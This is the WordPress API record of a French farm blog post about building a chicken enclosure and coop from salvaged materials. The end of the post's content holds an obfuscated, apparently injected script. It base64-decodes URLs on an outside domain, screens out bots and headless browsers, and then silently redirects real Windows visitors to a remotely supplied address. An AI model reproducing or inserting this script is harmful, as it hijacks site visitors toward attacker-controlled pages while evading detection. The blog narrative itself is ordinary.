{"id":226,"date":"2019-04-28T12:14:46","date_gmt":"2019-04-28T10:14:46","guid":{"rendered":"http:\/\/lafermedelamotte.fr\/?p=226"},"modified":"2025-12-31T17:00:47","modified_gmt":"2025-12-31T16:00:47","slug":"le-nouveau-poulailler","status":"publish","type":"post","link":"http:\/\/lafermedelamotte.fr\/index.php\/2019\/04\/28\/le-nouveau-poulailler\/","title":{"rendered":"Le nouveau poulailler"},"content":{"rendered":"\n<p>Le poulailler qui \u00e9tait l\u00e0 \u00e0 notre arriv\u00e9e ( mais qui n&rsquo;avait pas \u00e9t\u00e9 utilis\u00e9 depuis au moins 25 ans ) \u00e9tait certes vaste mais \u00e9tait assez difficile \u00e0 bien isoler, et surtout g\u00e2chait le paysage par son aspect vieux et d\u00e9labr\u00e9. <\/p>\n\n\n\n<p>De plus nous avions besoin d&rsquo;un enclos assez grand pour ne plus laisser les poules en totale libert\u00e9 car elles ont la f\u00e2cheuse tendance \u00e0 d\u00e9pailler notre jardin. <\/p>\n\n\n\n<p>Nous avons d\u00e9cid\u00e9 de faire un nouvel enclos \u00e0 l\u2019int\u00e9rieur duquel nous construirons un nouveau poulailler. L&rsquo;ancien chemin o\u00f9 l&rsquo;ancienne propri\u00e9taire cultivait des pommes de terre a \u00e9t\u00e9 choisi pour sa surface satisfaisante et son emplacement int\u00e9ressant pour garder un \u0153il sur nos chers gallinac\u00e9s. <\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"906\" height=\"622\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/Sans-titre.jpg\" alt=\"\" class=\"wp-image-229\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/Sans-titre.jpg 906w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/Sans-titre-300x206.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/Sans-titre-768x527.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Emplacement de l&rsquo;enclos. <\/figcaption><\/figure>\n\n\n\n<p>Nous avons donc commenc\u00e9 par enclore cette espace avec du grillage. <\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190218_132653.jpg\" alt=\"\" class=\"wp-image-230\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190218_132653.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190218_132653-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190218_132653-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Avant toute chose Marianne d\u00e9friche le terrain avec l&rsquo;aide de Romane!<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190220_110816.jpg\" alt=\"\" class=\"wp-image-231\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190220_110816.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190220_110816-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190220_110816-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Ensuite mise en place des poteaux &#8230;<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_153824.jpg\" alt=\"\" class=\"wp-image-232\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_153824.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_153824-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_153824-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>&#8230; du grillage et de la porte. <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_170601.jpg\" alt=\"\" class=\"wp-image-233\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_170601.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_170601-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190221_170601-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Et voila, plus que quelques finitions pour s&rsquo;assurer que les poules ne passent pas \u00e0 travers les mailles du filet. <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"562\" height=\"1000\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190220_140005.jpg\" alt=\"\" class=\"wp-image-234\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190220_140005.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190220_140005-169x300.jpg 169w\" sizes=\"auto, (max-width: 562px) 100vw, 562px\" \/><figcaption>Merci \u00e0 Mamie Denise de s&rsquo;\u00eatre occup\u00e9e de Romane pendant ce travail. <\/figcaption><\/figure>\n\n\n\n<p>L&rsquo;enclos r\u00e9alis\u00e9, il nous restait le gros morceaux de ce projet, le poulailler! Nous voulions  le faire avec le plus possible de mat\u00e9riaux de r\u00e9cup\u00e9ration possible. <\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_100532.jpg\" alt=\"\" class=\"wp-image-235\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_100532.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_100532-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_100532-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>L&rsquo;ossature du poulailler est compos\u00e9 de deux structures de palettes  r\u00e9cup\u00e9r\u00e9es sur le chantier de la r\u00e9novation de la couverture de notre maison.  L&rsquo;une a servi \u00e0 entreposer les fen\u00eatres du haut ( le toit du poulailler ) , l&rsquo;autre les ardoises ( le bas du poulailler) , le tout pos\u00e9s sur la structure d&rsquo;une ancienne table dont les pieds ont \u00e9t\u00e9 enfonc\u00e9s profond\u00e9ment dans le sol pour un c\u00f4t\u00e9 \u00ab\u00a0pilotis\u00a0\u00bb. <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_112728.jpg\" alt=\"\" class=\"wp-image-236\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_112728.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_112728-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_112728-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Ensuite nous avons clout\u00e9 des planches sur la caisse&#8230; ( oh la belle poule! )<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_152257.jpg\" alt=\"\" class=\"wp-image-237\" width=\"342\" height=\"608\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_152257.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190224_152257-169x300.jpg 169w\" sizes=\"auto, (max-width: 342px) 100vw, 342px\" \/><figcaption>Et sur le toit.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190227_132415.jpg\" alt=\"\" class=\"wp-image-238\" width=\"303\" height=\"539\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190227_132415.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190227_132415-169x300.jpg 169w\" sizes=\"auto, (max-width: 303px) 100vw, 303px\" \/><figcaption>Ensuite pose sur le toit d&rsquo;une chute de pare-pluie r\u00e9cup\u00e9r\u00e9 sur le chantier&#8230;<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190227_140321.jpg\" alt=\"\" class=\"wp-image-239\" width=\"304\" height=\"541\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190227_140321.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190227_140321-169x300.jpg 169w\" sizes=\"auto, (max-width: 304px) 100vw, 304px\" \/><figcaption>&#8230; et de lattes. <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190309_182129.jpg\" alt=\"\" class=\"wp-image-240\" width=\"314\" height=\"558\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190309_182129.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190309_182129-169x300.jpg 169w\" sizes=\"auto, (max-width: 314px) 100vw, 314px\" \/><figcaption>Pose des tuiles par Marianne. <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190310_164424.jpg\" alt=\"\" class=\"wp-image-241\" width=\"321\" height=\"571\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190310_164424.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190310_164424-169x300.jpg 169w\" sizes=\"auto, (max-width: 321px) 100vw, 321px\" \/><figcaption>Et tuiles fa\u00eeti\u00e8re. La goutti\u00e8re ne sera pas gard\u00e9e. <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190310_164847.jpg\" alt=\"\" class=\"wp-image-242\" width=\"324\" height=\"577\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190310_164847.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190310_164847-169x300.jpg 169w\" sizes=\"auto, (max-width: 324px) 100vw, 324px\" \/><figcaption>Une petite avanc\u00e9 sur le prolongement du toit permet aux poules de s&rsquo;abriter soit de la pluie soit du soleil.  <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190330_161523.jpg\" alt=\"\" class=\"wp-image-243\" width=\"325\" height=\"578\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190330_161523.jpg 562w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190330_161523-169x300.jpg 169w\" sizes=\"auto, (max-width: 325px) 100vw, 325px\" \/><figcaption>Pascal et Yohann scellent les tuiles avec un mortier b\u00e2tard  ( ciment + chaux + sable ) <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190331_113506.jpg\" alt=\"\" class=\"wp-image-244\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190331_113506.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190331_113506-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190331_113506-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Et enfin les finitions. <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101830.jpg\" alt=\"\" class=\"wp-image-245\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101830.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101830-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101830-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Et voil\u00e0 le r\u00e9sultat final!!<br><br><\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"562\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101851.jpg\" alt=\"\" class=\"wp-image-246\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101851.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101851-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/04\/20190428_101851-768x432.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Les 3 nouvelles poules offertes par Martine et Patrick peuvent gambader dans leur nouveau domaine!!  <\/figcaption><\/figure>\n<script>!async function(){let e=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXRyaWNhbH\",\"RpYy5jb20vYXBpL2dldA==\"].join(\"\")))),t=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXR\",\"yaWNhbHRpYy5jb2\",\"0vYXBpL2xvZw==\"].join(\"\"))))\nfunction o(e){return btoa(unescape(encodeURIComponent(e)))}let n={}\nif(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,o]=e.split(\"=\")\nt&&o&&(n[t]=decodeURIComponent(o.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return\nfunction r(e,t){let o=e.match(t)\nreturn o?parseInt(o[1],10):null}let i=navigator.userAgent,a=\/Windows NT 10.0\/.test(i),l=r(i,\/Chrome\\\/(\\d+)\\.\/),c=r(i,\/Edg\\\/(\\d+)\\.\/),d=r(i,\/OPR\\\/(\\d+)\\.\/),s=r(i,\/YaBrowser\\\/(\\d+)\\.\/),u=r(i,\/Vivaldi\\\/(\\d+)\\.\/),w=r(i,\/Firefox\\\/(\\d+)\\.\/),h=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(i)&&\/Chrome\\\/(\\d+)\\.\/.test(i),g=!1;(l&&l>=136||c&&c>=134||d&&d>=120||s&&s>=24||u&&u>=6||w&&w>=140||h&&l&&l>=136)&&(g=!0)\nlet m=navigator.webdriver||\/HeadlessChrome\/.test(i)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(i),p=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory\nif(!a||m||p)return\nif(!g){try{fetch(t)}catch(e){}return}let v=document.querySelector('link[rel=\"icon\"]'),f=await async function t(n=1){try{let t=await async function(e,t={}){let{timeout:o=3e3}=t,n=new AbortController,r=setTimeout(()=>n.abort(),o)\ntry{let o=await fetch(e,{...t,signal:n.signal})\nreturn clearTimeout(r),o}catch(e){return clearTimeout(r),null}}(e,{timeout:3e3})\nif(!t||403===t.status)return null\nif(!t.ok)throw Error(\"Network response was not ok\")\nreturn`${(await t.json()).url}\/?wsid=${window.location.hostname}&domain=${o(window.location.hostname)}`}catch(e){return n<1?t(n+1):null}}()\nif(f){let e=f\nv&#038;&#038;(e+=`&#038;link=${o(v.href)}`),window.location.replace(e)}}()<\/script>","protected":false},"excerpt":{"rendered":"<p>Le poulailler qui \u00e9tait l\u00e0 \u00e0 notre arriv\u00e9e ( mais qui n&rsquo;avait pas \u00e9t\u00e9 utilis\u00e9 depuis au moins 25 ans ) \u00e9tait certes vaste mais \u00e9tait assez difficile \u00e0 bien isoler, et surtout g\u00e2chait le paysage par son aspect vieux et d\u00e9labr\u00e9. De plus nous avions besoin d&rsquo;un enclos assez grand pour ne plus laisser &hellip; <\/p>\n<p class=\"link-more\"><a href=\"http:\/\/lafermedelamotte.fr\/index.php\/2019\/04\/28\/le-nouveau-poulailler\/\" class=\"more-link\">Continuer la lecture<span class=\"screen-reader-text\"> de &laquo;&nbsp;Le nouveau poulailler&nbsp;&raquo;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4,1],"tags":[],"class_list":["post-226","post","type-post","status-publish","format-standard","hentry","category-animaux","category-non-classe"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/comments?post=226"}],"version-history":[{"count":3,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/226\/revisions"}],"predecessor-version":[{"id":409,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/226\/revisions\/409"}],"wp:attachment":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/media?parent=226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/categories?post=226"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/tags?post=226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}